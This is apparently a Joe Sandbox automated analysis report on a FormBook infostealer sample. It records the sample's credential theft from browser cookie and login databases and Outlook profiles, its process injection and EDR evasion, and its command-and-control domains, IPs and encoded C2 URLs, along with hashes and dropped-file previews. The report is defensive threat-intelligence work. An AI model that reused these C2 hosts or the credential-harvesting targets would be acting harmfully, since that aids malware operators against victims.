            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: opp46lGmxd.exe | Binary or memory string: WIN_81
            Source: opp46lGmxd.exe | Binary or memory string: WIN_XP
            Source: opp46lGmxd.exe | Binary or memory string: WIN_XPe
            Source: opp46lGmxd.exe | Binary or memory string: WIN_VISTA
            Source: opp46lGmxd.exe | Binary or memory string: WIN_7
            Source: opp46lGmxd.exe | Binary or memory string: WIN_8
            Source: opp46lGmxd.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AD6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AD6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            MITRE ATT&CK Matrix (the number before a technique is the count of matched signatures):

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 26 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 61 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph (ID 1454256; sample opp46lGmxd.exe; start date 09/06/2024; architecture WINDOWS; score 100): opp46lGmxd.exe (Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process) starts svchost.exe, which maps a DLL or memory area into another process and injects hKABgfptdlPzDLVJYF.exe (Found direct / indirect Syscall (likely to bypass EDR)); hKABgfptdlPzDLVJYF.exe starts netbtugc.exe (Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures), which in turn injects hKABgfptdlPzDLVJYF.exe and starts firefox.exe. Top-level network nodes: www.joyesi.xyz, www.magmadokum.com and 19 other IPs or domains (Performs DNS queries to domains with low reputation); the injected hKABgfptdlPzDLVJYF.exe contacts www.rssnewscast.com 91.195.240.94 ports 49729, 49730, 49731 (SEDO-ASDE, Germany), elettrosistemista.zip 195.110.124.133 ports 49737, 49738, 49739 (REGISTER-ASIT, Italy) and 11 other IPs or domains. Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 5 other signatures.

            Source | Detection | Scanner | Label
            opp46lGmxd.exe | 58% | ReversingLabs | Win32.Trojan.Strab
            opp46lGmxd.exe | 68% | Virustotal | (Browse link)
            opp46lGmxd.exe | 100% | Avira | TR/AD.ShellcodeCrypter.yyenj
            opp46lGmxd.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1454256
Start date and time: 2024-06-09 17:58:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: opp46lGmxd.exe (renamed because original name is a hash value)
Original Sample Name: 0f399d1b3a7c6dd28867095c2bdb2098.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@16/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 59
• Number of non-executed functions: 271
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing disassembly code.

Time | Type | Description
12:00:11 | API Interceptor | 11298663x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.195.240.94 | mzrHGroQZy.hta | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | j5Gx6UXYOm.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | 5fG4r07BPy.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | eGHWPCyhLI.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Z1glGeDwjL.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | 9KBARIRa8X.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | N2sgk6jMa2.exe | malicious | FormBook | www.rssnewscast.com/fo8o/?aZ=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&qD=FrMTb
91.195.240.94 | 13820099132-PHOTO.lnk | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | 13820099133-PHOTO.lnk | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Utility R.lnk | malicious | FormBook | www.rssnewscast.com/fo8o/
116.50.37.244 | mzrHGroQZy.hta | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | j5Gx6UXYOm.exe | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | 5fG4r07BPy.exe | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | eGHWPCyhLI.exe | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | Z1glGeDwjL.exe | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | 9KBARIRa8X.exe | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | N2sgk6jMa2.exe | malicious | FormBook | www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=
116.50.37.244 | 13820099132-PHOTO.lnk | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | 13820099133-PHOTO.lnk | malicious | FormBook | www.goldenjade-travel.com/fo8o/
116.50.37.244 | Utility R.lnk | malicious | FormBook | www.goldenjade-travel.com/fo8o/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
natroredirect.natrocdn.com | mzrHGroQZy.hta | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | Yemenittiskes.exe | malicious | FormBook, GuLoader | 85.159.66.93
natroredirect.natrocdn.com | j5Gx6UXYOm.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | 5fG4r07BPy.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | eGHWPCyhLI.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | Z1glGeDwjL.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | 9KBARIRa8X.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | N2sgk6jMa2.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | 13820099132-PHOTO.lnk | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | 13820099133-PHOTO.lnk | malicious | FormBook | 85.159.66.93
www.kasegitai.tokyo | mzrHGroQZy.hta | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | j5Gx6UXYOm.exe | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | 5fG4r07BPy.exe | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | eGHWPCyhLI.exe | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | Z1glGeDwjL.exe | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | 9KBARIRa8X.exe | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | N2sgk6jMa2.exe | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | 13820099132-PHOTO.lnk | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | 13820099133-PHOTO.lnk | malicious | FormBook | 202.172.28.202
www.kasegitai.tokyo | Utility R.lnk | malicious | FormBook | 202.172.28.202
shops.myshopify.com | mzrHGroQZy.hta | malicious | FormBook | 23.227.38.74
shops.myshopify.com | Yemenittiskes.exe | malicious | FormBook, GuLoader | 23.227.38.74
shops.myshopify.com | j5Gx6UXYOm.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | 5fG4r07BPy.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | eGHWPCyhLI.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | Z1glGeDwjL.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | 9KBARIRa8X.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | N2sgk6jMa2.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | 13820099132-PHOTO.lnk | malicious | FormBook | 23.227.38.74
shops.myshopify.com | 13820099133-PHOTO.lnk | malicious | FormBook | 23.227.38.74
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DONGFONG-TWDongFongTechnologyCoLtdTW | mzrHGroQZy.hta | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | j5Gx6UXYOm.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | 5fG4r07BPy.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | eGHWPCyhLI.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Z1glGeDwjL.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | 9KBARIRa8X.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | N2sgk6jMa2.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | 13820099132-PHOTO.lnk | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | 13820099133-PHOTO.lnk | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Utility R.lnk | malicious | FormBook | 116.50.37.244
CIZGITR | mzrHGroQZy.hta | malicious | FormBook | 85.159.66.93
CIZGITR | j5Gx6UXYOm.exe | malicious | FormBook | 85.159.66.93
CIZGITR | 5fG4r07BPy.exe | malicious | FormBook | 85.159.66.93
CIZGITR | eGHWPCyhLI.exe | malicious | FormBook | 85.159.66.93
CIZGITR | Z1glGeDwjL.exe | malicious | FormBook | 85.159.66.93
CIZGITR | 9KBARIRa8X.exe | malicious | FormBook | 85.159.66.93
CIZGITR | N2sgk6jMa2.exe | malicious | FormBook | 85.159.66.93
CIZGITR | 13820099132-PHOTO.lnk | malicious | FormBook | 85.159.66.93
CIZGITR | 13820099133-PHOTO.lnk | malicious | FormBook | 85.159.66.93
CIZGITR | cbIcBAgY5W.exe | malicious | SystemBC | 94.73.188.24
SEDO-ASDE | mzrHGroQZy.hta | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Yemenittiskes.exe | malicious | FormBook, GuLoader | 91.195.240.19
SEDO-ASDE | Brudstyrken.exe | malicious | FormBook, GuLoader | 91.195.240.19
SEDO-ASDE | j5Gx6UXYOm.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | 5fG4r07BPy.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | eGHWPCyhLI.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Z1glGeDwjL.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | 9KBARIRa8X.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | N2sgk6jMa2.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | 13820099132-PHOTO.lnk | malicious | FormBook | 91.195.240.94
CLOUDFLARENETUS | mzrHGroQZy.hta | malicious | FormBook | 23.227.38.74
CLOUDFLARENETUS | Purchase Order #PO-240902.vbs | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | txxXmxvqsH.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | Yemenittiskes.exe | malicious | FormBook, GuLoader | 172.67.205.56
CLOUDFLARENETUS | https://documentshared.transfernow.net/en/bld?utm_source=202406077EMP6zVF | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | ShaderifyBeta 1.4.0.exe | malicious | Unknown | 104.26.13.205
CLOUDFLARENETUS | ShaderifyBeta 1.4.0.exe | malicious | Unknown | 172.67.74.152
CLOUDFLARENETUS | SecuriteInfo.com.Win32.Evo-gen.11892.21025.exe | malicious | Unknown | 104.21.66.98
CLOUDFLARENETUS | SecuriteInfo.com.Win32.Evo-gen.11892.21025.exe | malicious | Unknown | 104.21.66.98
CLOUDFLARENETUS | https://mephedrone.top/ | malicious | Unknown | 188.114.96.3

No context
No context
Process: C:\Windows\SysWOW64\netbtugc.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209935793793442
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
MD5: 214CFA91B0A6939C4606C4F99C9183B3
SHA1: A36951EB26E00F95BFD44C0851827A032EAFD91A
SHA-256: 660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
SHA-512: E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\opp46lGmxd.exe
File Type: ASCII text, with very long lines (28714), with no line terminators
Category: dropped
Size (bytes): 28714
Entropy (8bit): 3.5935727706886857
Encrypted: false
SSDEEP: 768:DiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbiE+Ik6Ng4vfF3if6gyz:DiTZ+2QoioGRk6ZklputwjpjBkCiw2Rd
MD5: 5499511E60E5982057F824140A3CC1B6
SHA1: CBFEA12068FD4328BE23B22D8E15F4C1872E52A1
SHA-256: 535664E59823A1AFD917846F38D8ABBEB6E95E83108D3A5965E1C18451EAF061
SHA-512: 7D1131C3F9D43647CB07C06BE8130D5196EB4017664F9CF3604DAA674E27E027A97B67883DDFD643C6AD082256AA47C9D2458E613B904DB55EBD86EBE62EDEB3
Malicious: false
Reputation: low
Preview:

Process: C:\Users\user\Desktop\opp46lGmxd.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.99287317318546
Encrypted: true
SSDEEP: 6144:ITGD6HllfZulE7NLFCbLPSqT7S2ACNFSqyFl5BipJB:ITGGF5Ml6NLFeFTrSl5Bip
MD5: CB375F8CD37172F4353C8DA688508CF7
SHA1: A515F2A7F10CD992685313054EA05339AC484408
SHA-256: EA59B47E1D041B58B06A03D1567E736B7ABFD7118106C432AB484934824494D8
SHA-512: BB0548D1836750526A5C3EEFE0B769C07D96C47245010A856E630249874289EE06CBACFCF607FF2CA2C9AB9634CBF6D815D3ED3F419F557479A8B063A93AFF4E
Malicious: false
Reputation: low
Preview: ..|..IJH7...C...s.JK....IX...OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH.CD3DO.7E.@.i.B..k.9P6o98'P1%^j30W+ =j*Rc6F$p8We...hZ, Vd]\3aOIJH7CDJKY..%(.w(P.yS-.K..s*/.Y.l1^.U...##..92Qx/..H7CD3JPQi.OI.I6C.[..Q9EOIJH7.D1K[P2EOYNH7CD3JPQ9.ZIJH'CD3jTQ9E.IJX7CD1JPW9EOIJH7ED3JPQ9EOiNH7AD3JPQ9GO..H7SD3ZPQ9E_IJX7CD3JPA9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9k;,2<7CD.ETQ9UOIJX3CD#JPQ9EOIJH7CD3JpQ9%OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3

Process: C:\Users\user\Desktop\opp46lGmxd.exe
File Type: data
Category: dropped
Size (bytes): 9852
Entropy (8bit): 7.5933700120283
Encrypted: false
SSDEEP: 192:mS5jnkklrTefgLqJrwy/6Yyu2f82lIBK60aa5wzyeP6ebh+DLkEcEsXfQ4PTQhkT:VnI00wRW1oveP6e1+sBXfQ4hT
MD5: 21AEAD0C8E4DF3EDBE9AA56F43FCEAFE
SHA1: F942F4B7A2A52E6D4FF8F3E7666227060667521A
SHA-256: 80D131A472F15A407FCFD5D50F2B291E22FB8B49C6636595455D64D2B01A5D4C
SHA-512: C65FB526E0A44D311360D085DAEA4AF03159D213F7697F6009EED9D2F5DB3B0B8BE58649373A12BBF4822EEC3849D557D0236AB1488D94B29081CCBCEC5D2C6C
Malicious: false
Reputation: low
Preview: EA06..p*.P.tY..kD.L'....8.M.t*..o7.Q'.)..aC.P......0.Mf.....8..lv;..e0..&.i...8.X.....m6.Nf.Y...9.M@..d.!,3y.........e.6., ..%..a.X....-.q3...zs0.Nf`.].Y'3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^.8.N@.=7.z...#.$...`!..H&.>_L.p..............@|..6..(....ka..&...Xf@0........|.=..g...........`.A..b.......P.O.id...|.)....4....\.M.4.;...K..4|. F...e.f..s....id..p.....4....s`./.....X. ..%..K.;-.o8...k ..4..`w..qd..f`....l.....V0...lS..m4.Y.......>.5...S...f&.+..Af....<..f....gl`....g.d..#4.x..#1.X...cV....0..BV0.NL@.;1.X..e1.Y,S[(.#6.,.d.....f.I......B3p....;2.X.se.Y..@.Fn.....f`...J&.9.......!93.X...c6).$.6.....h`...@.....3f.Lg3I..h....l.Z.,.....[%.ec...`....,vj...%.sb.X.,...p.....f.....g ...!8.....c.`!......3d...l.2.,...g.K..i0...B.....@.....j.0..B...Fl.....f....X.I..P...@

Process: C:\Users\user\Desktop\opp46lGmxd.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.99287317318546
Encrypted: true
SSDEEP: 6144:ITGD6HllfZulE7NLFCbLPSqT7S2ACNFSqyFl5BipJB:ITGGF5Ml6NLFeFTrSl5Bip
MD5: CB375F8CD37172F4353C8DA688508CF7
SHA1: A515F2A7F10CD992685313054EA05339AC484408
SHA-256: EA59B47E1D041B58B06A03D1567E736B7ABFD7118106C432AB484934824494D8
SHA-512: BB0548D1836750526A5C3EEFE0B769C07D96C47245010A856E630249874289EE06CBACFCF607FF2CA2C9AB9634CBF6D815D3ED3F419F557479A8B063A93AFF4E
Malicious: false
Reputation: low
Preview: ..|..IJH7...C...s.JK....IX...OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH.CD3DO.7E.@.i.B..k.9P6o98'P1%^j30W+ =j*Rc6F$p8We...hZ, Vd]\3aOIJH7CDJKY..%(.w(P.yS-.K..s*/.Y.l1^.U...##..92Qx/..H7CD3JPQi.OI.I6C.[..Q9EOIJH7.D1K[P2EOYNH7CD3JPQ9.ZIJH'CD3jTQ9E.IJX7CD1JPW9EOIJH7ED3JPQ9EOiNH7AD3JPQ9GO..H7SD3ZPQ9E_IJX7CD3JPA9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9k;,2<7CD.ETQ9UOIJX3CD#JPQ9EOIJH7CD3JpQ9%OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.109532074994351
                                                    TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: opp46lGmxd.exe
File size: 1'161'728 bytes
MD5: 0f399d1b3a7c6dd28867095c2bdb2098
SHA1: ad22ee54a3f642a81ff9f48fbaba9af1f39c79b8
SHA256: a49d396f7f272b32af4ef12abb52d5bc92ff2c97ca09b1d79436e13f1b9bf192
SHA512: 889e6e06eba7fcedfc0503203220073a8f1a07824185b859c93a4e107fdc347cf26e6424a58cd50d65c91959c5176471eaf050ca50d98cf265c91c94d38ecae6
SSDEEP: 24576:2AHnh+eWsN3skA4RV1Hom2KXMmHaueZzqHFotR95eTQ5:Rh+ZkldoPK8YaueIoF
TLSH: 5E35BD0273D2C036FFAB92739B6AF64156BC79254123852F13981DB9BD701B2263E763
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x42800a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66224BD0 [Fri Apr 19 10:47:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F46D09F0A5Dh
jmp 00007F46D09E3814h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
